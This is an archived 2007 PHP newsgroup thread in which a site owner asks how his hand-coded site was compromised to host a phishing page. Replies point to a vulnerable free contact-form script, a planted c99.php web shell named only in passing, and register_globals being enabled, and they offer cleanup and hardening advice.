Home > Archive > PHP Language > April 2007 > Unwilling phishing site host
You are viewing an archived Text-only version of the thread.
To view this thread in it's original format and/or if you want to reply to
this thread please [click here]
| Author |
Unwilling phishing site host
|
|
| Robin Faichney 2007-04-10, 6:57 pm |
| A site I run has somehow been used for phishing. The url was
http://genuine.site/www/scotiabank/com/pe/
I've assured the webhost that I'm not responsible and supplied dates
of more recent ftp and control panel access, and they suggest the
relevant files have been uploaded "via the website itself" but it's a
very simple hand-coded site using PHP only to ease design changes and
such, no bb/blog/whatever features. Can any PHP guru suggest how this
might have happened? It's Windows based, unfortunately, with PHP4.1, I
think, can't check because I can't access it now, it's been disabled.
--
<http://www.robinfaichney.org/>
| |
| Steve Belanger 2007-04-10, 6:57 pm |
| if your site somewhere has an upload features, if it's not protected against
specific filters, i believe that somebody can upload a php file that way and
execute it once its' uploaded. of course they will need to know where the
file has been saved on the server and so forth, but i believe that's a
potential way of putting files on a server to perform harmful actions.
"Robin Faichney" <robin@robinfaichney.invalid> wrote in message
news:dsmn131scn3jhn19ut9tv9knggip8go25s@
4ax.com...
>A site I run has somehow been used for phishing. The url was
> http://genuine.site/www/scotiabank/com/pe/
>
> I've assured the webhost that I'm not responsible and supplied dates
> of more recent ftp and control panel access, and they suggest the
> relevant files have been uploaded "via the website itself" but it's a
> very simple hand-coded site using PHP only to ease design changes and
> such, no bb/blog/whatever features. Can any PHP guru suggest how this
> might have happened? It's Windows based, unfortunately, with PHP4.1, I
> think, can't check because I can't access it now, it's been disabled.
> --
> <http://www.robinfaichney.org/>
| |
| Robin Faichney 2007-04-11, 3:58 am |
| On Tue, 10 Apr 2007 19:33:08 GMT, "Steve Belanger"
<desktop@ebinformatique.com> wrote:
[color=darkred]
>if your site somewhere has an upload features, if it's not protected against
>specific filters, i believe that somebody can upload a php file that way and
>execute it once its' uploaded. of course they will need to know where the
>file has been saved on the server and so forth, but i believe that's a
>potential way of putting files on a server to perform harmful actions.
>
>
>"Robin Faichney" <robin@robinfaichney.invalid> wrote in message
> news:dsmn131scn3jhn19ut9tv9knggip8go25s@
4ax.com...
I have some more info now. We were using the PHP contact script from
http://www.free-php-scripts.net/P/Contact_Form which includes file
upload facilities, though that option was switched off in the config
file. The PHP version is actually 4.4.6, and its config details can be
seen at http://www.theinvisibleeye.org/info.php
Is there anyone in this group who could look at this and check whether
that PHP installation is vulnerable and/or that script could somehow
have been used to upload even though the option was off? Or is there a
more appropriate group for such questions?
--
<http://www.robinfaichney.org/>
| |
|
| On 11 Apr, 09:38, Robin Faichney <r...@robinfaichney.invalid> wrote:
> On Tue, 10 Apr 2007 19:33:08 GMT, "Steve Belanger"
> <desk...@ebinformatique.com> wrote:
Not necessarily, just having a file upload script does not necessarily
mean it can be abused. Also, this is not the only route by which a
blackhat can get their code running on your site.
If possible, I would recommend downloading all the files from the site
and comparing with a known 'good' copy to try to identify anything
which has been modified. You should search the code from the server
for any include/require/include_once/require_once which has a non-
literal argument.
[color=darkred]
>From your config you have register globals enabled - this is bad.
> I have some more info now. We were using the PHP contact script fromhttp://www.free-php-scripts.net/P/Contact_Formwhich includes file
> upload facilities, though that option was switched off in the config
> file. The PHP version is actually 4.4.6, and its config details can be
> seen athttp://www.theinvisibleeye.org/info.php
>
> Is there anyone in this group who could look at this and check whether
> that PHP installation is vulnerable and/or that script could somehow
> have been used to upload even though the option was off? Or is there a
> more appropriate group for such questions?
It is far more likely that the attacker is targetting a vulnerability
in the code you are using - either the contact form (if this uses
email, there are several attacks including header injection which can
be used against such forms) or even on the webserver or operating
system itself.
You're first port of call would probably be the author(s) of the
contact form thingy.
HTH
C.
| |
| Robin Faichney 2007-04-12, 3:57 am |
| Thanks for all the comments. I've notified the webhost about register
globals being enabled and I've received the following explanation of
what seems to have happened.
"I still think it is
that contact.php page. I am almost certain that the hacking was done
through the website and not FTP or another method. My guess would be
that there is a security flaw somewhere in that contact.php which is
allowing file uploads even though it is disabled. This is backed up by
a
quick search on google for "Free-php-Scripts.net contact.php" (as
that's
the author site given in the script) for which the results are:
http://www.google.co.uk/search?hl=e...et+contact.php&
meta=
One of the entries (there are also other similar ones) is this, which
lists a security flaw in that script:
http://xforce.iss.net/xforce/xfdb/29874
As this is a known vulnerability, hackers probably scanned the
internet
for any site using it that they could compromise. There is also a file
called c99.php on your site which is a script designed to help hackers
do whatever they wish (
http://www.google.co.uk/search?hl=en&q=c99.php&meta= ). My guess is
that
this is the file that was uploaded using the security flaw in the
script. Once this was uploaded, they then used it to upload their
phishing scam etc. You should remove this c99.php file before the site
goes back online and check all other files in case of additional
changes
the hackers made."
--
<http://www.robinfaichney.org/>
| |
| Al Kolff 2007-04-17, 6:57 pm |
|
"Robin Faichney" <robin@robinfaichney.invalid> wrote in message
news:saaq13ta1h3jvn4rnm8nvog2qku6vhjuh8@
4ax.com...
> Thanks for all the comments. I've notified the webhost about register
> globals being enabled and I've received the following explanation of
> what seems to have happened.
>
> "I still think it is
> that contact.php page. I am almost certain that the hacking was done
> through the website and not FTP or another method. My guess would be
> that there is a security flaw somewhere in that contact.php which is
> allowing file uploads even though it is disabled. This is backed up by
> a
> quick search on google for "Free-php-Scripts.net contact.php" (as
> that's
> the author site given in the script) for which the results are:
> http://www.google.co.uk/search?hl=e...et+contact.php&
> meta=
>
> One of the entries (there are also other similar ones) is this, which
> lists a security flaw in that script:
> http://xforce.iss.net/xforce/xfdb/29874
>
> As this is a known vulnerability, hackers probably scanned the
> internet
> for any site using it that they could compromise. There is also a file
> called c99.php on your site which is a script designed to help hackers
> do whatever they wish (
> http://www.google.co.uk/search?hl=en&q=c99.php&meta= ). My guess is
> that
> this is the file that was uploaded using the security flaw in the
> script. Once this was uploaded, they then used it to upload their
> phishing scam etc. You should remove this c99.php file before the site
> goes back online and check all other files in case of additional
> changes
> the hackers made."
> --
> <http://www.robinfaichney.org/>
Robin,
While I love PHP this is one of those times it might pay to use perl along
with php. Contact pages and forms are gateways to all kinds of problems.
"nms formmail" works great and is fairly secure.( Just don't emulate matts
formmail or turn off the security features.
To protect your self from the scriptkiddies rename your scripts and files
and modify your code to match. How do I know these things? Being black
listed is no picnic to overcome.
God bless,
al
|
|
|
|
|